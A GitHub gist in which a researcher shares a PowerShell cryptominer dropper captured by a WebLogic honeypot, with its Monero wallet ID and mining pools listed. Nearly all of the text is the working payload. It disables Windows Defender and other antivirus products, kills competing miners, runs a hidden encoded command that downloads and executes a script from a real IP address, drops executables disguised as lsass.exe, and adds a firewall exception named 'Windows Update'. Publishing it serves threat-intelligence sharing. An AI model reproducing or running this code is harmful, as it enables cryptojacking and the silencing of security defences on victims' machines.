Skip to content

Instantly share code, notes, and snippets.

@nma-io

nma-io/weblogic_exploit.md

Last active March 28, 2018 01:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nma-io/4226b2e63bf44750c8b22798028f466d to your computer and use it in GitHub Desktop.
Save nma-io/4226b2e63bf44750c8b22798028f466d to your computer and use it in GitHub Desktop.
Download ZIP
XMR Miner - Honeypot hit.
Raw
weblogic_exploit.md

This one hit a weblogic honeypot.

Wallet ID: 43ZSpXdMerQGerimDrUviDN6qP3vkwnkZY1vvzTV22AbLW1oCCBDstNjXqrT3anyZ22j7DEE74GkbVcQFyH2nNiC3fchGfc

Uses minexmr.com and supportxmr.com

#Update
$WmiName = 'root\cimv2:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}
$WmiName = 'root\default:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}


$SrvName = "ZhuDongFangYu", "NisSrv","MsMpSvc","WdNisSvc","WinDefend", "MBAMService","a2AntiMalware"
foreach ($Srv in $SrvName)
{
#       Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue
#       Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue
        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
}
$ProName = "ZhuDongFangYu", "MsMpEng","MpCmdRun","msseces","NisSrv","MSASCui", "mbamtray","mbamservice","a2service"
foreach ($Pro in $ProName)
{
        Get-Process -Name $Pro -ErrorAction SilentlyContinue | Stop-Process -Force
}

$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\SpyNet" /v "SpyNetReporting" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\NisSrv /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\MsMpSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f


$CmdLine = Get-WmiObject -Class Win32_Process | Where-Object {$_.CommandLine -like '*LwBpAG0AYQBnAGUAcwAvAE4AZQB1AHQAcgBpAG4AbwAuAHAAcwAxAC*'}
if ($CmdLine -ne $Null)
{
        foreach ($n in $CmdLine)
        {
                $nPId = $($n.ProcessId)
                if ($nPId -eq $PId) { continue }
                Write-Host "[i] Neutrino PId: $nPId"
                Get-Process -Id $nPId | Stop-Process -Force
        }
}
$Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://121.17.28.15/images/DL.ps1');";
$ScriptBytes = [System.Text.Encoding]::Unicode.GetBytes($Script);
$EncodedScript = [System.Convert]::ToBase64String($ScriptBytes);

$Path = "$Env:SystemRoot\System32\WindowsPowerShell\v1.0\PowerShell.exe"
$Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
$Process = Start-Process -FilePath $Path -ArgumentList $Argv -WindowStyle Hidden -PassThru
$ProcessId = $($Process.Id)
if ($ProcessId -ne $Null)
{
        Write-Host "[+] Neutrino PS Process Id is $ProcessId"
}
else
{
        Write-Host "[-] Neutrino PS Process Id is NULL"
}


#Downloader
$x86 = "http://121.17.28.15/images/test/x86.exe"
$x64 = "http://121.17.28.15/images/test/x64.exe"
$File = "$Env:WinDir\Temp\lsass.eXe"
$WC = New-Object System.Net.WebClient


$Dir = "$Env:WinDir\Temp";
if (!(Test-Path $Dir)){ New-Item $Dir -Type Directory; }
if (!((Get-Item $File -Force) -is [IO.FileInfo])) { Remove-Item $File -Force -ErrorAction SilentlyContinue }


$OS = (Get-WmiObject Win32_ComputerSystem).SystemType
$SO = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
if (($OS -Match '64') -Or ($SO -Match '64'))
{
        Write-Host "[i] OS 64-bit"
        $WC.DownloadFile($x64, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://121.17.28.15/images/test/x64_VMP.exe", $File)
        }
}
else
{
        Write-Host '[i] OS 32-bit'
        $WC.DownloadFile($x86, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://121.17.28.15/images/test/x86_VMP.exe", $File)
        }
}

if (Test-Path $File)
{
        Write-Host '[+] Downloaded'
        $Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
        IEX $WC.DownloadString('http://121.17.28.15/images/test/WMI.ps1')
}
else
{
        Write-Host '[-] Fail To Download'
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment